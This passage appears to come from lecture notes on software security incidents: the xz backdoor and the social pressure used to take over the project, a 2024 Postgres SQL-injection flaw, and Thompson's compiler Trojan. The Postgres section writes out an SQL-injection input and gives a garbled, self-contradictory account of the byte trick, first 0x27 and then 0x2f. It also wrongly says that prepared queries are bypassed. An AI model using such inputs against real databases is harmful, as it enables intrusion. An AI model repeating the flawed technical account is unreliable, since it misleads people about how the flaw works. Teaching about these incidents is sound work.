      attacks. It uses the xz compression library, maintained by Lasse Collin
      (who is blameless here).
    
    
    Here is a discussion of the attack itself: 
research.swtch.com/xz-script.
      Perhaps the most interesting technical part of the attack is how the
      malicious payload is concealed. xz has always had a test directory of
      random data; this is compressed and then the result is checked against
      what it was supposed to be. The attackers introduced a binary malicious
      payload into the test data! The standard configure script runs an m4
      (well-known macro package) script, which (in a non-obvious way) extracts
      this binary payload and runs it, at a specified point. When ssh calls xz
      on certain data (the key provided by the attacker), the payload enables
      remote command execution.
 
    
    
    But how did the xz project get compromised? This is
      in many ways the more interesting part. See 
research.swtch.com/xz-timeline.
      The package dates from 2004 (ssh is much older, but started to use xz
      later). In October 2021, 
Jia Tan appears on the xz mailing list,
      and sends his first patch. He sends more. He gives every appearance of
      someone interested in helping the xz package move forward. I have put his
      name in italics because it appears this is not a real name.
 
    
    
    In April 2022, Jigar Kumar emails the list
      complaining that the Tan patches have not been incorporated.
      Then Denis Ens similarly emails to complain about the Java
      version. Kumar continues to pressure Collin about how this
      project is just way behind, and that Collin needs to pick up the pace.
      (This sort of abuse is common enough in open source.) In June, Collin
      writes this:
    
      I haven't lost interest but my ability to care has been fairly limited
        mostly due to longterm mental health issues but also due to some other
        things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and
        perhaps he will have a bigger role in the future, we'll see. It's also
        good to keep in mind that this is an unpaid hobby project.
     
    Soon enough, Collin bows to the pressure and Tan
      becomes a maintainer. But Tan takes his time, building more
      trust; the actual attack isn't loaded until March 9, 2024. 
    
    
    It is tempting to suspect that this is a nation-state
      project, due to the two-year timeline. That takes patience. But there are
      some things to suggest that maybe not. The Tan and Kumar
      emails have similar formats: Tan is JiaT575 and Kumar
      is similar. And while the obfuscation technique is ingenious, there were
      some minor problems with the payload.
    
    
    The article at 
doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
      suggests that was really being backdoored was systemd, the master process
      launcher. I'm not quite convinced, but systemd does start sshd, and does
      have waay too many dependencies.
 
    
    
    Finally, if you cloned the package from git and built
      it yourself, the bug would not be there. You had to be building for a
      deb/rpm package distribution.
    
      
2024 Postgres SQL-injection vulnerability
    
    Postgres has a long history of being careful to
      prevent SQL injection. Here's the basic example. You want to query the
      record of a specific user, to check their password, where $username is a
      string taken from the input:
    
    
        select * from users u where
      u.username = '$username'
    
    
    The idea is to supply as input the username 
bob'
        or 1=1;'
      This then expands naively into
         select * from users u where u.username = 'bob' or
          1=1;''
      Which returns all users because the 1=1 condition is
        always true.
      But everyone uses prepared queries with Postgres: select * from users u
        where u.username = $1. This means all the quote marks (and other bad
        characters) in the $username string are properly escaped: the above bad
        username would now be bob\' or 1=1;\', and this is not
        incorrectly parsed. How does the new injection happen? Unicode!
      The Unicode escape character for two-byte Unicode sequences is 0xc0 (at
        least the first three bits must be 110). If this is seen by the Postgres
        string parser, and the following byte is part of a legitimate two-byte
        Unicode sequence, then that Unicode character is returned. 
      But, and here's the bug, if the character following the 0xc0 does not
        make a legitimate two-byte Unicode sequence, then just the second
        character is returned.
      So what the attackers did was use 0xc0 0x27. This is not a recognized
        Unicode sequence, and so the character 0x27 is returned.
      Which is a single quote mark: '
      So now the attackers can insert single quote marks into the data for
        prepared queries, which means our bad example above works even with
        prepared queries provided we replace ' with 0xc0 0x2f. 
      This attack was used on the US Treasury in December 2024. More at slamdunksoftware.substack.com/p/hidden-messages-in-emojis-and-hacking.
     
    Thompson Backdoor
    Ken Thompson is one of the original developers of Unix. In his 1983
      Turing Award speech, "Reflections on Trusting Trust", he described the
      following hack:
    
      - The Unix login program is modified to allow in someone with a certain
        userid and password
 
      - The C compiler would insert this modification whenever login.c was
        compiled, so compiling from a clean copy of login.c wouldn't help
 
      - The C compiler would also insert modifications whenever it
        itself was recompiled, so recompiling the C compiler would still leave
        you with the Trojan in place.
 
    
    There was one more step: when the compiler was asked to disassemble the
      Trojaned code, it would show what the code was supposed to be,
      not what it actually was.
    Thompson did implement this as a demo. Nobody really thinks
      anyone is trying this today.